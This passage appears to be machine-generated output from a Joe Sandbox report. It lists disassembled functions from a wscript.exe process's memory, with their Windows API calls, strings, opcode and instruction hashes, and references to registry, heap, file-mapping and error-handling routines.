                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 0ef6c1fea1ce21cd79df25e4547fd02f401fbc4d6ac0f14ac314b2a44197860d
                                            • Instruction ID: d722d4874c56e91d5dae049f6bf367af49203688d5138850d809ca32e2a72800
                                            • Opcode Fuzzy Hash: 0ef6c1fea1ce21cd79df25e4547fd02f401fbc4d6ac0f14ac314b2a44197860d
                                            • Instruction Fuzzy Hash: 0441E031700242AFDB21DE25CC41F6ABBE5FF84718F15061AF995EB240DB21F8569BE1
                                            Function 04E12300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: e9e13ff3e931681a326966dd14cdc318e8a19a264841f729b9bb1a465335fa38
                                            • Instruction ID: 51b598f8ce403adcfb0bcf22a9b800fbf87561750fff3d438e1334dadf743bc1
                                            • Opcode Fuzzy Hash: e9e13ff3e931681a326966dd14cdc318e8a19a264841f729b9bb1a465335fa38
                                            • Instruction Fuzzy Hash: 46318272A002199FDB20DF29CC40BFEB7F8EB44754F445596E949E3210EB30BA548BA1
                                            Function 009BA5A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(00000000,Shell,00000000,00020006,?,00000000,00000000,?,009BA758,?,Open2,?,009BA8DE,00000000), ref: 009BA5BA
                                            • RegSetValueExA.ADVAPI32(?,009B3DC0,00000000,00000001,009BA758,00000001,?,009BA758,?,Open2,?,009BA8DE,00000000), ref: 009BA5F0
                                            • RegCloseKey.ADVAPI32(?,?,009BA758,?,Open2,?,009BA8DE,00000000), ref: 009BA5FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CloseOpenValue
                                            • String ID: Shell
                                            • API String ID: 779948276-2220072441
                                            • Opcode ID: 7f6cc1842a2d263f9be72b6dcd5821189e9a1c16901bb78155bbc1587450af33
                                            • Instruction ID: 2f342d60d31784d0ebb3907fd22d8389e8f094fe62441159d641dbcd2b8664fa
                                            • Opcode Fuzzy Hash: 7f6cc1842a2d263f9be72b6dcd5821189e9a1c16901bb78155bbc1587450af33
                                            • Instruction Fuzzy Hash: 4101D677A50224BBDB358B648D05FFE7729AB84B60F148158FD42AB140CAA2DE059690
                                            Function 009BB1AA Relevance: 6.2, APIs: 4, Instructions: 174COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,009B73FB,009B3A24,WSHRemote.Execute,00000A2C), ref: 009BB1C7
                                            • SetErrorInfo.OLEAUT32(00000000,?,?,?,?), ref: 009BB31A
                                            • SysFreeString.OLEAUT32(009B3A24), ref: 009BB36D
                                            • SysFreeString.OLEAUT32(009B73FB), ref: 009BB376
                                              • Part of subcall function 009BB654: FormatMessageW.KERNEL32(00000500,009B3A24,00000000,00000000,?,00000000,?,?,00000A2C,00000000,009BB25F,?,?,?,?), ref: 009BB68F
                                              • Part of subcall function 009BB654: GetLastError.KERNEL32(?,00000A2C,00000000,009BB25F,?,?,?,?,?,009B73FB,009B3A24,WSHRemote.Execute,00000A2C), ref: 009BB69D
                                              • Part of subcall function 009BB654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,009BB25F,?), ref: 009BB774
                                              • Part of subcall function 009BB654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,009BB25F,?), ref: 009BB783
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Free$Error$InfoLocalString$CreateFormatLastMessage
                                            • String ID:
                                            • API String ID: 878232057-0
                                            • Opcode ID: 8822e977ee52fd06873f6bde1900589d91e889db5b7b6da571520b0a858bc2d2
                                            • Instruction ID: a163bcef6eaf2638029e895d1d6e78050ad10320f11d5a2e143b2014e2d866a2
                                            • Opcode Fuzzy Hash: 8822e977ee52fd06873f6bde1900589d91e889db5b7b6da571520b0a858bc2d2
                                            • Instruction Fuzzy Hash: 1E517C75B1160AEBCB04DF95E994AAD7BF9FF48324F210069E60297390CF74AD02DB81
                                            Function 009C5017 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadStringW.USER32(?,?,00000800,00000000), ref: 009C5055
                                            • LoadStringA.USER32(?,?,00000800,00000000), ref: 009C5071
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,?,00000800,00000000,00000000,00000000,?,009BBAA2,?,?), ref: 009C508E
                                            • SysAllocString.OLEAUT32(?), ref: 009C50A1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$Load$AllocByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1944948655-0
                                            • Opcode ID: 5e63d0714f140cb5c9a71fffd57d456b52b7219770d99a526ef4d92b3e4bc944
                                            • Instruction ID: 7bb49fc11cd69ed6b8a40f9e62ac98e33065761fdafcde78c9e55bc237585438
                                            • Opcode Fuzzy Hash: 5e63d0714f140cb5c9a71fffd57d456b52b7219770d99a526ef4d92b3e4bc944
                                            • Instruction Fuzzy Hash: AC11C272D14129AFE761DB65DC08EEBB7ACEB84710F044069B609D2150DF309E44DBA0
                                            Function 009C61F1 Relevance: 6.1, APIs: 4, Instructions: 51fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileSize.KERNEL32(009B9D3D,00000000,00000000,00000000,?,009C61DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 009C620F
                                            • CreateFileMappingA.KERNEL32(009B9D3D,00000000,00000002,00000000,00000000,00000000), ref: 009C6229
                                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,009C61DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 009C623C
                                            • GetLastError.KERNEL32(?,009C61DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,00000000,00000000), ref: 009C6249
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: File$CreateErrorLastMappingSizeView
                                            • String ID:
                                            • API String ID: 2735091159-0
                                            • Opcode ID: 55c737a47d97bab302c6bec9348bb98897b8b4c10f9844962b30e34ee7575d19
                                            • Instruction ID: 8ede5c479651bd27729c9361dd601c54a109d2c3f8e5528a676104829b916390
                                            • Opcode Fuzzy Hash: 55c737a47d97bab302c6bec9348bb98897b8b4c10f9844962b30e34ee7575d19
                                            • Instruction Fuzzy Hash: E3016275914252AAD7305B779C0CF277AECEBC6B20B104A2DB975C2290DA34D800E735
                                            Function 04DA7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 6bf2654a12b0c6f1adef0105c2530cd8f2616f351a9622e6f9de0837100d58dd
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: B6918071F002169ADF24DF69C881ABEB7A5FF44720F14451BE855AB2C0E730EA619761
                                            Function 04D69126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 73dd881debe29a1210113d64a508a2f650dd20adf6da92e931f067f1f534e8ea
                                            • Instruction ID: 738de1e90a34fa1da3e2366e827dd6a69e1ec3f25b173c4ef59482e365644682
                                            • Opcode Fuzzy Hash: 73dd881debe29a1210113d64a508a2f650dd20adf6da92e931f067f1f534e8ea
                                            • Instruction Fuzzy Hash: F2811CB1E002699BDB35DF54CC55BEEB7B8AF48714F1041DAA919B7240E734AE84CFA0
                                            Function 009B7034 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 009B7041
                                            • CoGetInterfaceAndReleaseStream.OLE32(?,009B38D0,?), ref: 009B707B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CurrentInterfaceReleaseStreamThread
                                            • String ID: wscript
                                            • API String ID: 1806872144-434116418
                                            • Opcode ID: 9f6e11344d8a98f7e6e4ef51f3803ebbbeb9b310c67f7892fc052a1ffc5fa181
                                            • Instruction ID: d5a5e32bb443ea550b2d71cda51513be4295ee7268781ed1a013224a511b4870
                                            • Opcode Fuzzy Hash: 9f6e11344d8a98f7e6e4ef51f3803ebbbeb9b310c67f7892fc052a1ffc5fa181
                                            • Instruction Fuzzy Hash: 6451F53160C3059FD724EFA9CA86BFAF7F5AFC0724F14461DE5029B691DBB5A8048B11
                                            Function 009C21CD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 009C5901: RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,009B10C4,00000000,00000000,?,009C21E8), ref: 009C5933
                                              • Part of subcall function 009C5AB3: RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,-00000001,00000004,00000004,TrustPolicy,009B10C4,00000000,009B10C4,00000000,-00000001), ref: 009C5AEE
                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,-00000001,00020019,00000000,009B1100,?,?,?,009BAB73,80000002,009B10E4), ref: 009C2258
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CloseCreateQueryValue
                                            • String ID: DisplayLogo$Timeout
                                            • API String ID: 4083198587-1251482861
                                            • Opcode ID: f22149d5ba17693f9d37f2818f2ebaddf417dcc5ee7a18b841c76187bbcd4c35
                                            • Instruction ID: 6f0bba4760cd8f12c3901d08f39cd44b31796a66ef485a0ccb8c5c4cfac872fd
                                            • Opcode Fuzzy Hash: f22149d5ba17693f9d37f2818f2ebaddf417dcc5ee7a18b841c76187bbcd4c35
                                            • Instruction Fuzzy Hash: 4511E932B04609DFDB15CBA8C845F9A77EA9BD8324F25807DE46AD3341DA74ED41D322
                                            Function 009C51D4 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51E5
                                            • HeapFree.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51EC
                                            • GetProcessHeap.KERNEL32(00000000,009B10C4,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C520B
                                            • HeapAlloc.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C5212
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: d32dd0fc664e55e0ace8235d0ff7ffe5887962f100a9135cc44915ef2cde8385
                                            • Instruction ID: 3ad3745f27ec39e4e8e2116a16058f78856425fa27605882de259f1c361d1290
                                            • Opcode Fuzzy Hash: d32dd0fc664e55e0ace8235d0ff7ffe5887962f100a9135cc44915ef2cde8385
                                            • Instruction Fuzzy Hash: 79F0AF31958602DBD7245BB8A80DF1676ECAB08331F26891DF56ACA1A0DA74E8C0DB56